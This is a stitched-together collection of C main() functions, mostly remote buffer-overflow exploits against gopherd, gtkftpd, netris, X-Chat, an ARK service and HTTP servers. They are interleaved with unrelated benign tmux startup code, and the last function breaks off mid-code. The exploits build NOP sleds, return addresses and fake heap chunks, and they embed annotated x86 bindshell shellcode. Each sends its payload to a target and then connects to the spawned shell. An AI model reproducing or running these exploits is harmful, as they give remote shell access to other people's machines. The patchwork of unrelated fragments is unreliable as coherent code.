/* begin. */ int main(int argc,char **argv){ unsigned short port=0,sport=DFL_BINDSHELL_PORT; char *hostptr; printf("[*] gopher[v3.0.9+]: remote (client) buffer overflow exp" "loit.\n[*] by: vade79/v9 [email protected] (fakehalo/realhalo)\n\n"); if(argc<2){ printf("[!] syntax: %s <port> [bindshell port]\n",argv[0]); exit(1); } port=atoi(argv[1]); if(argc>2)sport=atoi(argv[2]); /* set the port to bind to in the shellcode. */ x86_exec[20]=(sport&0xff00)>>8; x86_exec[21]=(sport&0x00ff); /* verbose values display. */ printf("[*] replacement \"vi\" address\t\t: 0x%.8x\n",REPLACE_VI_ADDR); printf("[*] return address\t\t\t: 0x%.8x\n",RET_ADDR); printf("[*] offset from the end of tmpstr[]\t: %d (=%d)\n", PLACEMENT_OFFSET,PLACEMENT_OFFSET*4); printf("[*] server port\t\t\t\t: %u\n",port); printf("[*] bindshell port\t\t\t: %u\n\n",sport); /* wait for a connection and send overflow. */ hostptr=gopherd_bind(port); /* be safe, and give it time to run. */ sleep(3); /* see if a shell spawned. */ getshell(hostptr,sport); exit(0); }
void ftp_parse(int sock){ unsigned int offset=0; ftp_read(sock); /* get the banner. */ ftp_printf(sock,"USER %s\r\n",user); ftp_read(sock); ftp_printf(sock,"PASS %s\r\n",pass); ftp_read(sock); ftp_printf(sock,"CWD %s\r\n",writedir); ftp_read(sock); basedir=getbdir(); /* tmp dir of our own to use. */ ftp_printf(sock,"MKD %s\r\n",basedir); ftp_read(sock); ftp_printf(sock,"CWD %s\r\n",basedir); ftp_read(sock); while(offset<(attempts*400)){ /* if it hasn't yet, it's not going to. */ /* slight null-byte/CR check, only needs to check the last byte. */ if((!reverse&&!((baseaddr-offset)&0xff))||(reverse&&!((baseaddr+offset) &0xff))||(!reverse&&((baseaddr-offset)&0xff)=='\n')||(reverse&& ((baseaddr+offset)&0xff)=='\n')){ printf("[!] brute address contains null-byte/CR, increasing offset " "by one byte.\n"); offset++; /* one byte off if reversed won't hurt here. (401) */ } /* make the evil oversized directory. (255 or less bytes) */ ftp_printf(sock,"MKD %s\r\n",getdir(offset)); ftp_read(sock); /* date+directory exceeds 256 byte buffer, the exploit. */ sleep(1); /* delay insurance. */ ftp_printf(sock,"LIST -%s\r\n",getcode()); /* nothing to read here, and gtkftpd processes (the exploit) */ /* before the ftp list connection is made, making it */ /* pointless to view the list. */ sleep(1); /* delay insurance, again, just to be sure. */ /* delete directory, multiples will cause failure(s). */ ftp_printf(sock,"RMD %s\r\n",getdir(offset)); ftp_read(sock); getshell(sock,offset); offset+=400; /* always at least 400 nops in a row, in shellcode. */ } ftp_clean(sock); close(sock); return; }
int main(int argc,char **argv){ unsigned short isbind=0,nport=DFLPORT; /* default. */ char *hostptr; printf("[*] netris[v0.5-]: client/server remote buffer overflow ex" "ploit.\n[*] by: vade79/v9 [email protected] (fakehalo)\n\n"); if(argc<2){ printf("[!] syntax: %s <host|-b> [port]\n",argv[0]); exit(1); } if(!strcmp(argv[1],"-b")) isbind=1; if(argc>2) nport=atoi(argv[2]); if(isbind) hostptr=netris_bind(nport); else netris_connect((hostptr=argv[1]),nport); sleep(1); getshell(hostptr,45295); /* defined in shellcode. */ exit(0); }
int main(int argc,char **argv){ unsigned short port=DFLPORT,sport=DFLSPRT; unsigned int retaddr=BSEADDR; char *hostptr; if(BUFSIZE<0||BUFSIZE>255)printe("BUFSIZE must be 1-255(char/int8).",1); printf("[*] X-Chat[v1.8.0-v2.0.8]: socks-5 remote buffer overflow exp" "loit.\n[*] by: by: vade79/v9 v9 fakehalo deadpig org (fakehalo)\n\n"); if(argc<2){ printf("[!] syntax: %s <offset from 0x%.8x> [port] [shell port]\n\n", argv[0],BSEADDR); exit(1); } if(argc>1)retaddr-=atoi(argv[1]); if(argc>2)port=atoi(argv[2]); if(argc>3)sport=atoi(argv[3]); x86_exec[20]=(sport&0xff00)>>8; x86_exec[21]=(sport&0x00ff); printf("[*] eip: 0x%.8x, socks-5 port: %u, bindshell port: %u.\n", retaddr,port,sport); hostptr=socks5_bind(port,retaddr); sleep(1); getshell(hostptr,sport); exit(0); }
int main(int argc, char **argv) { struct passwd *pw; char *s, *path, *label, *home, **var; int opt, flags, quiet, keys; #if defined(DEBUG) && defined(__OpenBSD__) malloc_options = (char *) "AFGJPX"; #endif flags = IDENTIFY_256COLOURS | IDENTIFY_UTF8; quiet = 0; label = path = NULL; login_shell = (**argv == '-'); while ((opt = getopt(argc, argv, "28c:Cdf:lL:qS:uUvV")) != -1) { switch (opt) { case '2': flags |= IDENTIFY_256COLOURS; flags &= ~IDENTIFY_88COLOURS; break; case '8': flags |= IDENTIFY_88COLOURS; flags &= ~IDENTIFY_256COLOURS; break; case 'c': free(shell_cmd); shell_cmd = xstrdup(optarg); break; case 'C': if (flags & IDENTIFY_CONTROL) flags |= IDENTIFY_TERMIOS; else flags |= IDENTIFY_CONTROL; break; case 'V': printf("%s %s\n", __progname, VERSION); exit(0); case 'f': free(cfg_file); cfg_file = xstrdup(optarg); break; case 'l': login_shell = 1; break; case 'L': free(label); label = xstrdup(optarg); break; case 'q': quiet = 1; break; case 'S': free(path); path = xstrdup(optarg); break; case 'u': flags |= IDENTIFY_UTF8; break; case 'v': debug_level++; break; default: usage(); } } argc -= optind; argv += optind; if (shell_cmd != NULL && argc != 0) usage(); if (!(flags & IDENTIFY_UTF8)) { /* * If the user has set whichever of LC_ALL, LC_CTYPE or LANG * exist (in that order) to contain UTF-8, it is a safe * assumption that either they are using a UTF-8 terminal, or * if not they know that output from UTF-8-capable programs may * be wrong. */ if ((s = getenv("LC_ALL")) == NULL || *s == '\0') { if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0') s = getenv("LANG"); } if (s != NULL && (strcasestr(s, "UTF-8") != NULL || strcasestr(s, "UTF8") != NULL)) flags |= IDENTIFY_UTF8; } environ_init(&global_environ); for (var = environ; *var != NULL; var++) environ_put(&global_environ, *var); options_init(&global_options, NULL); options_table_populate_tree(server_options_table, &global_options); options_set_number(&global_options, "quiet", quiet); options_init(&global_s_options, NULL); options_table_populate_tree(session_options_table, &global_s_options); options_set_string(&global_s_options, "default-shell", "%s", getshell()); options_init(&global_w_options, NULL); options_table_populate_tree(window_options_table, &global_w_options); /* Enable UTF-8 if the first client is on UTF-8 terminal. */ if (flags & IDENTIFY_UTF8) { options_set_number(&global_s_options, "status-utf8", 1); options_set_number(&global_s_options, "mouse-utf8", 1); options_set_number(&global_w_options, "utf8", 1); } /* Override keys to vi if VISUAL or EDITOR are set. */ if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) { if (strrchr(s, '/') != NULL) s = strrchr(s, '/') + 1; if (strstr(s, "vi") != NULL) keys = MODEKEY_VI; else keys = MODEKEY_EMACS; options_set_number(&global_s_options, "status-keys", keys); options_set_number(&global_w_options, "mode-keys", keys); } /* Locate the configuration file. */ if (cfg_file == NULL) { home = getenv("HOME"); if (home == NULL || *home == '\0') { pw = getpwuid(getuid()); if (pw != NULL) home = pw->pw_dir; } xasprintf(&cfg_file, "%s/%s", home, DEFAULT_CFG); if (access(cfg_file, R_OK) != 0 && errno == ENOENT) { free(cfg_file); cfg_file = NULL; } } /* * Figure out the socket path. If specified on the command-line with -S * or -L, use it, otherwise try $TMUX or assume -L default. */ parseenvironment(); if (path == NULL) { /* If no -L, use the environment. */ if (label == NULL) { if (environ_path != NULL) path = xstrdup(environ_path); } /* -L or default set. */ if (!path) { if ((path = makesocketpath(label)) == NULL) { fprintf(stderr, "can't create socket\n"); exit(1); } } } free(label); strlcpy(socket_path, path, sizeof socket_path); free(path); #ifdef HAVE_SETPROCTITLE /* Set process title. */ setproctitle("%s (%s)", __progname, socket_path); #endif /* Pass control to the client. */ ev_base = osdep_event_init(); exit(client_main(argc, argv, flags)); }
int main(int argc, char **argv) { char *path, *label, **var, tmp[PATH_MAX], *shellcmd = NULL; const char *s; int opt, flags, keys; #if defined(DEBUG) && defined(__OpenBSD__) malloc_options = (char *) "AFGJPX"; #endif setlocale(LC_TIME, ""); tzset(); if (**argv == '-') flags = CLIENT_LOGIN; else flags = 0; #ifdef TMATE tmate_catch_sigsegv(); flags |= CLIENT_256COLOURS | CLIENT_UTF8; #endif label = path = NULL; while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) { switch (opt) { case '2': flags |= CLIENT_256COLOURS; break; case 'c': free(shellcmd); shellcmd = xstrdup(optarg); break; case 'C': if (flags & CLIENT_CONTROL) flags |= CLIENT_CONTROLCONTROL; else flags |= CLIENT_CONTROL; break; case 'V': printf("%s %s\n", __progname, VERSION); exit(0); case 'f': set_cfg_file(optarg); break; case 'l': flags |= CLIENT_LOGIN; break; case 'L': free(label); label = xstrdup(optarg); break; case 'q': break; case 'S': free(path); path = xstrdup(optarg); break; case 'u': flags |= CLIENT_UTF8; break; case 'v': log_add_level(); break; default: usage(); } } argc -= optind; argv += optind; if (shellcmd != NULL && argc != 0) usage(); #ifdef __OpenBSD__ if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd " "recvfd proc exec tty ps", NULL) != 0) err(1, "pledge"); #endif /* * tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8. * Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain * UTF-8, it is a safe assumption that either they are using a UTF-8 * terminal, or if not they know that output from UTF-8-capable * programs may be wrong. */ if (getenv("TMUX") != NULL) flags |= CLIENT_UTF8; else { s = getenv("LC_ALL"); if (s == NULL || *s == '\0') s = getenv("LC_CTYPE"); if (s == NULL || *s == '\0') s = getenv("LANG"); if (s == NULL || *s == '\0') s = ""; if (strcasestr(s, "UTF-8") != NULL || strcasestr(s, "UTF8") != NULL) flags |= CLIENT_UTF8; } global_hooks = hooks_create(NULL); global_environ = environ_create(); for (var = environ; *var != NULL; var++) environ_put(global_environ, *var); if (getcwd(tmp, sizeof tmp) != NULL) environ_set(global_environ, "PWD", "%s", tmp); global_options = options_create(NULL); options_table_populate_tree(OPTIONS_TABLE_SERVER, global_options); global_s_options = options_create(NULL); options_table_populate_tree(OPTIONS_TABLE_SESSION, global_s_options); options_set_string(global_s_options, "default-shell", "%s", getshell()); global_w_options = options_create(NULL); options_table_populate_tree(OPTIONS_TABLE_WINDOW, global_w_options); /* Override keys to vi if VISUAL or EDITOR are set. */ if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) { if (strrchr(s, '/') != NULL) s = strrchr(s, '/') + 1; if (strstr(s, "vi") != NULL) keys = MODEKEY_VI; else keys = MODEKEY_EMACS; options_set_number(global_s_options, "status-keys", keys); options_set_number(global_w_options, "mode-keys", keys); } /* * If socket is specified on the command-line with -S or -L, it is * used. Otherwise, $TMUX is checked and if that fails "default" is * used. */ if (path == NULL && label == NULL) { s = getenv("TMUX"); if (s != NULL && *s != '\0' && *s != ',') { path = xstrdup(s); path[strcspn (path, ",")] = '\0'; } } if (path == NULL && (path = make_label(label)) == NULL) { fprintf(stderr, "can't create socket: %s\n", strerror(errno)); exit(1); } socket_path = path; free(label); /* Pass control to the client. */ exit(client_main(event_init(), argc, argv, flags, shellcmd)); }
int main( int argc, char **argv) { /* first 2 bytes are a type 74 request */ /* last two bytes length */ char head[] = "\x00\x4a\x00\x03\x00\x01\xff\xff"; char data[512]; char sc_req[20000]; char *host; unsigned int tnum; unsigned int safeaddr; unsigned int ret; int datalen = LEN; int port = ARK_PORT; unsigned int addr = 0; int sock_overflow, sock_nops, sock_shell; int i; if (argc == 3) { host = argv[1]; tnum = atoi(argv[2]); if (tnum > NUMTARGS || tnum == 0) { fprintf(stderr, "[!] Invalid target\n"); usage(argv[0]); } } else { usage(argv[0]); } tnum--; ret = targets[tnum].targret; safeaddr = targets[tnum].targsafe; sock_overflow = sock_nops = sock_shell = 0; sock_nops = isock(host, port); sock_overflow = isock(host, port); // build data section of overflow packet memset(data, 0x90, datalen); for (i = 0; i < datalen; i += 4) memcpy(data+i, (char *)&ret, 4); // we overwrite a pointer that must be a valid address memcpy(data+datalen-12, (char *)&safeaddr, 4); // build header of overflow packet datalen = ntohs(datalen); memcpy(head+6, (char *)&datalen, 2); // build invalid packet with nops+shellcode memset(sc_req, 0x90, NOP_LEN+1); memcpy(sc_req+NOP_LEN, shellcode, sizeof(shellcode)); // send invalid nop+shellcode packet fprintf(stderr, "[*] Sending nops+shellcode\n"); write(sock_nops, sc_req, NOP_LEN+sizeof(shellcode)); fprintf(stderr, "[*] Done, sleeping\n"); sleep(1); close(sock_nops); // send overflow fprintf(stderr, "[*] Sending overflow\n"); write(sock_overflow, head, HEAD_LEN); write(sock_overflow, data, LEN); fprintf(stderr, "[*] Done\n"); fprintf(stderr, "[*] Sleeping and connecting remote shell\n"); sleep (1); close(sock_overflow); // connect to shell sock_shell = isock(host, SHELL_PORT); fprintf(stderr, "[*] Success, enjoy\n"); getshell(sock_shell); }
int main(int argc, char **argv) { char *s, *path, *label, **var, tmp[PATH_MAX]; int opt, flags, keys; #if defined(DEBUG) && defined(__OpenBSD__) malloc_options = (char *) "AFGJPX"; #endif setlocale(LC_TIME, ""); if (**argv == '-') flags = CLIENT_LOGIN; else flags = 0; label = path = NULL; while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) { switch (opt) { case '2': flags |= CLIENT_256COLOURS; break; case 'c': free(shell_cmd); shell_cmd = xstrdup(optarg); break; case 'C': if (flags & CLIENT_CONTROL) flags |= CLIENT_CONTROLCONTROL; else flags |= CLIENT_CONTROL; break; case 'V': printf("%s %s\n", __progname, VERSION); exit(0); case 'f': set_cfg_file(optarg); break; case 'l': flags |= CLIENT_LOGIN; break; case 'L': free(label); label = xstrdup(optarg); break; case 'q': break; case 'S': free(path); path = xstrdup(optarg); break; case 'u': flags |= CLIENT_UTF8; break; case 'v': debug_level++; break; default: usage(); } } argc -= optind; argv += optind; if (shell_cmd != NULL && argc != 0) usage(); if (!(flags & CLIENT_UTF8)) { /* * If the user has set whichever of LC_ALL, LC_CTYPE or LANG * exist (in that order) to contain UTF-8, it is a safe * assumption that either they are using a UTF-8 terminal, or * if not they know that output from UTF-8-capable programs may * be wrong. */ if ((s = getenv("LC_ALL")) == NULL || *s == '\0') { if ((s = getenv("LC_CTYPE")) == NULL || *s == '\0') s = getenv("LANG"); } if (s != NULL && (strcasestr(s, "UTF-8") != NULL || strcasestr(s, "UTF8") != NULL)) flags |= CLIENT_UTF8; } environ_init(&global_environ); for (var = environ; *var != NULL; var++) environ_put(&global_environ, *var); if (getcwd(tmp, sizeof tmp) != NULL) environ_set(&global_environ, "PWD", tmp); options_init(&global_options, NULL); options_table_populate_tree(server_options_table, &global_options); options_init(&global_s_options, NULL); options_table_populate_tree(session_options_table, &global_s_options); options_set_string(&global_s_options, "default-shell", "%s", getshell()); options_init(&global_w_options, NULL); options_table_populate_tree(window_options_table, &global_w_options); /* Enable UTF-8 if the first client is on UTF-8 terminal. */ if (flags & CLIENT_UTF8) { options_set_number(&global_s_options, "status-utf8", 1); options_set_number(&global_s_options, "mouse-utf8", 1); options_set_number(&global_w_options, "utf8", 1); } /* Override keys to vi if VISUAL or EDITOR are set. */ if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) { if (strrchr(s, '/') != NULL) s = strrchr(s, '/') + 1; if (strstr(s, "vi") != NULL) keys = MODEKEY_VI; else keys = MODEKEY_EMACS; options_set_number(&global_s_options, "status-keys", keys); options_set_number(&global_w_options, "mode-keys", keys); } /* * Figure out the socket path. If specified on the command-line with -S * or -L, use it, otherwise try $TMUX or assume -L default. */ if (path == NULL) { /* If no -L, use the environment. */ if (label == NULL) { s = getenv("TMUX"); if (s != NULL) { path = xstrdup(s); path[strcspn (path, ",")] = '\0'; if (*path == '\0') { free(path); label = xstrdup("default"); } } else label = xstrdup("default"); } /* -L or default set. */ if (label != NULL) { if ((path = makesocketpath(label)) == NULL) { fprintf(stderr, "can't create socket: %s\n", strerror(errno)); exit(1); } } } free(label); if (strlcpy(socket_path, path, sizeof socket_path) >= sizeof socket_path) { fprintf(stderr, "socket path too long: %s\n", path); exit(1); } free(path); #ifdef HAVE_SETPROCTITLE /* Set process title. */ setproctitle("%s (%s)", __progname, socket_path); #endif /* Pass control to the client. */ exit(client_main(event_init(), argc, argv, flags)); }
int main(int argc,char *argv[]) { int port=D_PORT; char hostname[0x333]=D_HOST; int whlp,type=0; unsigned int i=0; char buf[BUFSIZE+1]; char buf2[BUFSIZE2+1]; char sendbuf[BUFSIZE3+1]; int sd; u_long retaddr=__pl_form[type].retaddr; (void)banrl(); while((whlp=getopt(argc,argv,"T:t:H:h:P:p:IiXx"))!=EOF) { extern char *optarg; switch(whlp) { case 'T': case 't': if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; } else (void)x_fp_rm_usage(argv[0]); break; case 'H': case 'h': memset((char *)hostname,0,sizeof(hostname)); strncpy(hostname,optarg,sizeof(hostname)-1); break; case 'P': case 'p': port=atoi(optarg); break; case 'I': case 'i': fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); case '?': (void)x_fp_rm_usage(argv[0]); break; } } if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); } { fprintf(stdout," [+] Hostname: %s\n",hostname); fprintf(stdout," [+] Port num: %d\n",port); fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); memset(buf, 0x90, BUFSIZE); memcpy(&buf[BUFSIZE-(sizeof(retaddr))], &retaddr, sizeof(retaddr)); memset(buf2,0x90,88); memcpy(buf2+88,shell, sizeof(shell)); snprintf(sendbuf,1024,"GET %s /HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf,buf2); fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); fprintf(stdout," [1] #1 Send codes.\n"); write(sd,sendbuf,BUFSIZE3); close(sd); sleep(1); fprintf(stdout," [1] #3 Get shell.\n"); getshell(hostname,26112); exit(0); }
int main(int argc,char *argv[]) { int at_sock; int ts_sock; int port=PORT; int roup; char ttatk_code[36864]; char hostname[0x82]=HOST; char main_str[] = /* BIND SHELL ON PORT TCP/36864 */ //------------------- main: -------------------// "\xeb\x72" /* jmp callz */ //------------------- start: ------------------// "\x5e" /* popl %esi */ //------------------ socket() -----------------// "\x29\xc0" /* subl %eax, %eax */ "\x89\x46\x10" /* movl %eax, 0x10(%esi) */ "\x40" /* incl %eax */ "\x89\xc3" /* movl %eax, %ebx */ "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ "\x40" /* incl %eax */ "\x89\x46\x08" /* movl %eax, 0x08(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------- bind() ------------------// "\x43" /* incl %ebx */ "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ "\x88\x46\x08" /* movb %al, 0x08(%esi) */ "\x29\xc0" /* subl %eax, %eax */ "\x89\xc2" /* movl %eax, %edx */ "\x89\x46\x18" /* movl %eax, 0x18(%esi) */ "\xb0\x90" /* movb $0x90, %al */ "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ listen() -----------------// "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ "\x43" /* incl %ebx */ "\x43" /* incl %ebx */ "\xb0\x66" /* movb $0x66, %al */ "\xcd\x80" /* int $0x80 */ //------------------ accept() -----------------// "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ "\x89\x56\x10" /* movl %edx, 0x10(%esi) */ "\xb0\x66" /* movb $0x66, %al */ "\x43" /* incl %ebx */ "\xcd\x80" /* int $0x80 */ //---- dup2(s, 0), dup2(s, 1), dup2(s, 2) -----// "\x86\xc3" /* xchgb %al, %bl */ "\xb0\x3f" /* movb $0x3f, %al */ "\x29\xc9" /* subl %ecx, %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ "\xb0\x3f" /* movb $0x3f, %al */ "\x41" /* incl %ecx */ "\xcd\x80" /* int $0x80 */ //------------------ execve() -----------------// "\x88\x56\x07" /* movb %dl, 0x07(%esi) */ "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ "\x87\xf3" /* xchgl %esi, %ebx */ "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ "\xb0\x0b" /* movb $0x0b, %al */ "\xcd\x80" /* int $0x80 */ //------------------- callz: ------------------// "\xe8\x89\xff\xff\xff" /* call start */ "/bin/sh"; /* 128byte */ #define plus_4str(x0x) x0x+=4 int x0x_num=0; int x0x_size=0; #define BUF_LEN 1024 char *debug_test; char code_128len[BUF_LEN]; char x82_16x0x[]={ /* 16byte */ 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82,0x82,0x82,0x82,0x82, 0x82 }; char nop_n_jump[4]={0x41,0xeb,0x0c,0x42}; int nop_12jump=0; int ok_cont=0; int target_type_number=0; char p_rev_size[4]={0xff,0xff,0xff,0xfc}; /* chunk size */ char size_fd[4]={0xff,0xff,0xff,0xff}; /* data section size */ char atk_chunk[BUF_LEN]; unsigned long retloc=pl_form[target_type_number].retloc; unsigned long retaddr=pl_form[target_type_number].retaddr;//.stkaddr; memset(ttatk_code,0x00,36864); memset(atk_chunk,0x00,BUF_LEN); memset(code_128len,0x00,BUF_LEN); (void)banrl(argv[0]); while((roup=getopt(argc,argv,"R:r:S:s:H:h:P:p:"))!=EOF) { switch(roup) { case 'R': case 'r': retloc=strtoul(optarg,NULL,0); break; case 'S': case 's': retaddr=strtoul(optarg,NULL,0); break; case 'H': case 'h': memset(hostname,0x00,0x82); strncpy(hostname,optarg,0x82); break; case 'P': case 'p': port=atoi(optarg); break; case '?': (void)usage(argv[0]); break; } } //--- make fake chunk ---// fprintf(stdout," [1] Make fake chunk.\n"); for(x0x_num=0;x0x_num<strlen(x82_16x0x);x0x_num++) atk_chunk[x0x_num]=x82_16x0x[x0x_num]; *(long*)&atk_chunk[x0x_num]=0xfffffffc; // prev_size plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=0xffffffff; // size(P) plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retloc-0x0c; // Forward pointer plus_4str(x0x_num); *(long*)&atk_chunk[x0x_num]=retaddr; // Back pointer plus_4str(x0x_num); //--- make code ---// fprintf(stdout," [2] Make shellcode.\n"); for(nop_12jump=0;nop_12jump<0x190;plus_4str(nop_12jump)) *(long*)&code_128len[nop_12jump]=0x41eb0c42; for(x0x_num=0,ok_cont=nop_12jump;x0x_num<strlen(main_str);x0x_num++) code_128len[ok_cont++]=main_str[x0x_num]; //--- fake chunk + 0x20 + (nop + 12byte jmpcode + nop + shellcode) ---// snprintf(ttatk_code,36864, "%s%s%s\r\n",atk_chunk,"\x20",code_128len); fprintf(stdout," [3] Send exploit (bindshell) code.\n"); { // Try two times connections. It's Point. :-) /* 1 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); close(at_sock); /* 2 */ at_sock=setsock(hostname,port); re_conenter(at_sock); send(at_sock,ttatk_code,strlen(ttatk_code),0); } fprintf(stdout," [4] Waiting, executes the shell !\n"); sleep(3); fprintf(stdout," [5] Trying %s:36864 ...\n",hostname); /* 3 */ ts_sock=setsock(hostname,36864); re_conenter(ts_sock); fprintf(stdout," [6] Connected to %s:36864 !\n\n",hostname); // Execute bash shell getshell(ts_sock); }
int main(int argc, char **argv) { char *path, *label, tmp[PATH_MAX]; char *shellcmd = NULL, **var; const char *s, *shell; int opt, flags, keys; const struct options_table_entry *oe; if (setlocale(LC_CTYPE, "en_US.UTF-8") == NULL) { if (setlocale(LC_CTYPE, "") == NULL) errx(1, "invalid LC_ALL, LC_CTYPE or LANG"); s = nl_langinfo(CODESET); if (strcasecmp(s, "UTF-8") != 0 && strcasecmp(s, "UTF8") != 0) errx(1, "need UTF-8 locale (LC_CTYPE) but have %s", s); } setlocale(LC_TIME, ""); tzset(); if (**argv == '-') flags = CLIENT_LOGIN; else flags = 0; label = path = NULL; while ((opt = getopt(argc, argv, "2c:Cdf:lL:qS:uUVv")) != -1) { switch (opt) { case '2': flags |= CLIENT_256COLOURS; break; case 'c': free(shellcmd); shellcmd = xstrdup(optarg); break; case 'C': if (flags & CLIENT_CONTROL) flags |= CLIENT_CONTROLCONTROL; else flags |= CLIENT_CONTROL; break; case 'V': printf("%s %s\n", getprogname(), VERSION); exit(0); case 'f': set_cfg_file(optarg); break; case 'l': flags |= CLIENT_LOGIN; break; case 'L': free(label); label = xstrdup(optarg); break; case 'q': break; case 'S': free(path); path = xstrdup(optarg); break; case 'u': flags |= CLIENT_UTF8; break; case 'v': log_add_level(); break; default: usage(); } } argc -= optind; argv += optind; if (shellcmd != NULL && argc != 0) usage(); if ((ptm_fd = getptmfd()) == -1) err(1, "getptmfd"); if (pledge("stdio rpath wpath cpath flock fattr unix getpw sendfd " "recvfd proc exec tty ps", NULL) != 0) err(1, "pledge"); /* * tmux is a UTF-8 terminal, so if TMUX is set, assume UTF-8. * Otherwise, if the user has set LC_ALL, LC_CTYPE or LANG to contain * UTF-8, it is a safe assumption that either they are using a UTF-8 * terminal, or if not they know that output from UTF-8-capable * programs may be wrong. */ if (getenv("TMUX") != NULL) flags |= CLIENT_UTF8; else { s = getenv("LC_ALL"); if (s == NULL || *s == '\0') s = getenv("LC_CTYPE"); if (s == NULL || *s == '\0') s = getenv("LANG"); if (s == NULL || *s == '\0') s = ""; if (strcasestr(s, "UTF-8") != NULL || strcasestr(s, "UTF8") != NULL) flags |= CLIENT_UTF8; } global_hooks = hooks_create(NULL); global_environ = environ_create(); for (var = environ; *var != NULL; var++) environ_put(global_environ, *var); if (getcwd(tmp, sizeof tmp) != NULL) environ_set(global_environ, "PWD", "%s", tmp); global_options = options_create(NULL); global_s_options = options_create(NULL); global_w_options = options_create(NULL); for (oe = options_table; oe->name != NULL; oe++) { if (oe->scope == OPTIONS_TABLE_SERVER) options_default(global_options, oe); if (oe->scope == OPTIONS_TABLE_SESSION) options_default(global_s_options, oe); if (oe->scope == OPTIONS_TABLE_WINDOW) options_default(global_w_options, oe); } /* * The default shell comes from SHELL or from the user's passwd entry * if available. */ shell = getshell(); options_set_string(global_s_options, "default-shell", 0, "%s", shell); /* Override keys to vi if VISUAL or EDITOR are set. */ if ((s = getenv("VISUAL")) != NULL || (s = getenv("EDITOR")) != NULL) { if (strrchr(s, '/') != NULL) s = strrchr(s, '/') + 1; if (strstr(s, "vi") != NULL) keys = MODEKEY_VI; else keys = MODEKEY_EMACS; options_set_number(global_s_options, "status-keys", keys); options_set_number(global_w_options, "mode-keys", keys); } /* * If socket is specified on the command-line with -S or -L, it is * used. Otherwise, $TMUX is checked and if that fails "default" is * used. */ if (path == NULL && label == NULL) { s = getenv("TMUX"); if (s != NULL && *s != '\0' && *s != ',') { path = xstrdup(s); path[strcspn(path, ",")] = '\0'; } } if (path == NULL && (path = make_label(label)) == NULL) { fprintf(stderr, "can't create socket: %s\n", strerror(errno)); exit(1); } socket_path = path; free(label); /* Pass control to the client. */ exit(client_main(osdep_event_init(), argc, argv, flags, shellcmd)); }
int main(int argc,char *argv[]) { int port=D_PORT; char hostname[0x333]=D_HOST; int whlp,type=0; unsigned int i=0; char buf[141]; char buf2[2078]; char sendbuf[3150]; char buf3[141]; int sd; int ftpsd; u_long retaddr=__pl_form[type].retaddr; (void)banrl(); while((whlp=getopt(argc,argv,"T:t:H:h:u:c:a:P:p:IiXx"))!=EOF) { extern char *optarg; switch(whlp) { case 'T': case 't': if((type=atoi(optarg))<6) { retaddr=__pl_form[type].retaddr; } else (void)x_fp_rm_usage(argv[0]); break; case 'H': case 'h': memset((char *)hostname,0,sizeof(hostname)); strncpy(hostname,optarg,sizeof(hostname)-1); break; case 'u': if(!user&&!(user=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'a': if(!pass&&!(pass=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'c': if(!writedir&&!(writedir=(char *)strdup(optarg))) printe("main(): allocating memory failed.",1); break; case 'P': case 'p': port=atoi(optarg); break; case 'I': case 'i': fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]); exit(-1); case '?': (void)x_fp_rm_usage(argv[0]); break; } } if(!strcmp(hostname,D_HOST)) { (void)x_fp_rm_usage(argv[0]); } else { fprintf(stdout," [+] Hostname: %s\n",hostname); fprintf(stdout," [+] Port num: %d\n",port); fprintf(stdout," [+] Retaddr address: %p\n",retaddr); } fprintf(stdout," [1] #1 Set codes.\n"); ftpsd=sock_connect(hostname,21); ftp_parse(ftpsd); memset(buf3,0x42,141); memset(buf2,0x90,1000); memcpy(buf2+1000,shell,strlen(shell)); memset(buf2+1000+strlen(shell),0x90,1000); snprintf(sendbuf,3150,"GET /%s/%s/%s/%s/%s/%s/%s/ HTTP/1.0\r\nUser-Agent: %s\r\n\r\n",buf3,buf3,buf3,buf3,buf3,buf3,buf3,buf2); fprintf(stdout," [1] #1 Set socket.\n"); sd=sock_connect(hostname,port); fprintf(stdout," [1] #1 Send codes.\n"); write(sd,sendbuf,3150); close(sd); sleep(10); fprintf(stdout," [1] #3 Get shell.\n"); 